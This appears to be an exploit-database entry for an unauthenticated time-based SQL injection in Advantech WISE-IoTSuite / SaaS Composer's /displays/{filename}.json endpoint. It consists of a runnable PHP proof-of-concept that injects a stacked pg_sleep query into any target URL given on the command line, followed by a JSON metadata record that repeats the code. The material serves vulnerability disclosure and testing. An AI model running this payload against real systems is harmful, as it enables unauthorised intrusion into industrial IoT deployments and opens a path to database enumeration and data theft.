📄 Advantech IoTSuite / IoT Edge SQL Injection_PACKETSTORM:214605

Description

A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite / SaaS Composer. The issue resides in the /displays/filename.json endpoint, where the filename parameter is improperly sanitized before being concatenated...

Visit Original Source

Basic Information

ID PACKETSTORM:214605

Published Jan 30, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Advantech IoTSuite / IoT Edge Products SaaS Composer – Unauthenticated Time-Based SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.advantech.com/en |
=============================================================================================================================================

[+] References :

[+] Summary : A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite / SaaS Composer.
The issue resides in the /displays/{filename}.json endpoint, where the filename parameter is improperly sanitized before being concatenated into a backend PostgreSQL query.
An attacker can exploit this flaw by injecting stacked SQL queries, such as a time-based payload using pg_sleep(), to confirm successful query execution.
This vulnerability may allow database enumeration, sensitive data disclosure, and under certain configurations, could potentially lead to remote code execution depending on database privileges.
The vulnerability can be exploited remotely without authentication, posing a significant security risk to affected deployments.

[+] POC :

<?php

error_reporting(E_ALL);
ini_set("display_errors", 1);

$SLEEP_TIME = 10;
$TIMEOUT = 15;

function build_payload_path($org_id, $sleep_time) {
return "/displays/filename.json'; select pg_sleep(" . $sleep_time . ") --?org_id=" . $org_id;
}

function test_vulnerability($base_url, $org_id, $sleep_time, $timeout) {

if (!preg_match('#^https?://#', $base_url)) {
$base_url = "https://" . $base_url;
}

$payload = build_payload_path($org_id, $sleep_time);
$target = rtrim($base_url, '/') . $payload;

echo "[+] Target URL : {$base_url}\n";
echo "[+] Injecting : org_id={$org_id}\n";
echo "[+] Payload : {$payload}\n";
echo "[+] Full URL : {$target}\n";
echo "----------------------------------------------------\n";

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $target,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => $timeout
]);

$start = microtime(true);
curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
echo "[!] ERROR: {$error}\n";
exit(3);
}

$duration = microtime(true) - $start;
printf("[*] Response time: %.2f seconds\n", $duration);

if ($duration >= $sleep_time) {
echo "\n=== RESULT: VULNERABLE ===\n";
echo "[+] Time-based SQL injection confirmed.\n";
echo "[+] PostgreSQL pg_sleep() executed.\n";
echo "[+] Further impact depends on DB privileges.\n";
exit(0);
} else {
echo "\n=== RESULT: NOT VULNERABLE ===\n";
echo "[-] No significant delay detected.\n";
exit(1);
}
}

$options = getopt("", ["url:", "org::"]);

if (!isset($options["url"])) {
echo "Usage: php advantech_sqli_poc.php --url https://target --org 1\n";
exit(1);
}

$org_id = isset($options["org"]) ? (int)$options["org"] : 1;

echo "==========================================================\n";
echo " Advantech SaaS Composer - SQL Injection PoC by indoushka\n";
echo "==========================================================\n";
echo "[*] Using org_id = {$org_id}\n\n";

test_vulnerability($options["url"], $org_id, $SLEEP_TIME, $TIMEOUT);

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

{
    "lastseen": "2026-01-30T17:51:18",
    "description": "A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite / SaaS Composer. The issue resides in the /displays/filename.json endpoint, where the filename parameter is improperly sanitized before being concatenated...",
    "published": "2026-01-30T00:00:00",
    "modified": "2026-01-30T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Advantech IoTSuite / IoT Edge SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214605",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Advantech IoTSuite / IoT Edge Products SaaS Composer \u2013 Unauthenticated Time-Based SQL Injection                             |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.advantech.com/en                                                                                                |\n    =============================================================================================================================================\n    \n    [+] References : \n    \n    [+] Summary    : A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite / SaaS Composer.\n                     The issue resides in the /displays/{filename}.json endpoint, where the filename parameter is improperly sanitized before being concatenated into a backend PostgreSQL query.\n                     An attacker can exploit this flaw by injecting stacked SQL queries, such as a time-based payload using pg_sleep(), to confirm successful query execution.\n                     This vulnerability may allow database enumeration, sensitive data disclosure, and under certain configurations, could potentially lead to remote code execution depending on database privileges.\n                     The vulnerability can be exploited remotely without authentication, posing a significant security risk to affected deployments.\n    \n    [+] POC :\n    \n    <?php\n    \n    error_reporting(E_ALL);\n    ini_set(\"display_errors\", 1);\n    \n    $SLEEP_TIME = 10;\n    $TIMEOUT    = 15;\n    \n    function build_payload_path($org_id, $sleep_time) {\n        return \"/displays/filename.json'; select pg_sleep(\" . $sleep_time . \") --?org_id=\" . $org_id;\n    }\n    \n    function test_vulnerability($base_url, $org_id, $sleep_time, $timeout) {\n    \n        if (!preg_match('#^https?://#', $base_url)) {\n            $base_url = \"https://\" . $base_url;\n        }\n    \n        $payload = build_payload_path($org_id, $sleep_time);\n        $target  = rtrim($base_url, '/') . $payload;\n    \n        echo \"[+] Target URL : {$base_url}\\n\";\n        echo \"[+] Injecting  : org_id={$org_id}\\n\";\n        echo \"[+] Payload    : {$payload}\\n\";\n        echo \"[+] Full URL   : {$target}\\n\";\n        echo \"----------------------------------------------------\\n\";\n    \n        $ch = curl_init();\n        curl_setopt_array($ch, [\n            CURLOPT_URL            => $target,\n            CURLOPT_RETURNTRANSFER => true,\n            CURLOPT_SSL_VERIFYPEER => false,\n            CURLOPT_SSL_VERIFYHOST => false,\n            CURLOPT_TIMEOUT        => $timeout\n        ]);\n    \n        $start = microtime(true);\n        curl_exec($ch);\n        $error = curl_error($ch);\n        curl_close($ch);\n    \n        if ($error) {\n            echo \"[!] ERROR: {$error}\\n\";\n            exit(3);\n        }\n    \n        $duration = microtime(true) - $start;\n        printf(\"[*] Response time: %.2f seconds\\n\", $duration);\n    \n        if ($duration >= $sleep_time) {\n            echo \"\\n=== RESULT: VULNERABLE ===\\n\";\n            echo \"[+] Time-based SQL injection confirmed.\\n\";\n            echo \"[+] PostgreSQL pg_sleep() executed.\\n\";\n            echo \"[+] Further impact depends on DB privileges.\\n\";\n            exit(0);\n        } else {\n            echo \"\\n=== RESULT: NOT VULNERABLE ===\\n\";\n            echo \"[-] No significant delay detected.\\n\";\n            exit(1);\n        }\n    }\n    \n    $options = getopt(\"\", [\"url:\", \"org::\"]);\n    \n    if (!isset($options[\"url\"])) {\n        echo \"Usage: php advantech_sqli_poc.php --url https://target --org 1\\n\";\n        exit(1);\n    }\n    \n    $org_id = isset($options[\"org\"]) ? (int)$options[\"org\"] : 1;\n    \n    echo \"==========================================================\\n\";\n    echo \" Advantech SaaS Composer - SQL Injection PoC by indoushka\\n\";\n    echo \"==========================================================\\n\";\n    echo \"[*] Using org_id = {$org_id}\\n\\n\";\n    \n    test_vulnerability($options[\"url\"], $org_id, $SLEEP_TIME, $TIMEOUT);\n    \n    \n    \t\n    Greetings to :============================================================\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\n    ==========================================================================",
    "sourceHref": "https://packetstorm.news/download/214605",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214605/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply